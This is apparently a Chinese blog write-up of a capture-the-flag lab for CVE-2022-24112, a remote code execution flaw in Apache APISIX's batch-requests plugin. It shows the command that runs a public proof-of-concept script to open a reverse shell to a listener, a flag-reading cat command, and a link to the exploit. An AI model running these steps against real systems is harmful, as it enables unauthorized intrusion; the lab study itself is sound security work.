[春秋云镜]CVE-2022-24112

  • Post author:
  • Post category:其他


声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!

靶场介绍


Apache Apisix是美国阿帕奇(Apache)基金会的一个云原生的微服务API网关服务。该软件基于 OpenResty 和 etcd 来实现,具备动态路由和插件热加载,适合微服务体系下的 API 管理。 Apache APISIX中存在远程代码执行漏洞,该漏洞源于产品的batch-requests插件未对用户的批处理请求进行有效限制。攻击者可通过该漏洞绕过Admin API的IP限制,容易导致远程代码执行。


春秋云镜开启靶场:


http://eci-2ze4llupfqpdq7xjdiet.cloudeci1.ichunqiu.com:9080/


exp可以直接打


vps先开一个监听


命令格式


python3 poc2.py -t eci-2zebn203x9kbbx7banv2.cloudeci1.ichunqiu.com -p 9080 -L 127.0.0.1 -P 9999


执行poc  vps成功收到shell


命令cat ../../../../../../flag  读取flag


POC地址



https://codeload.github.com/twseptian/cve-2022-24112/zip/refs/heads/main



版权声明:本文为niubi707原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。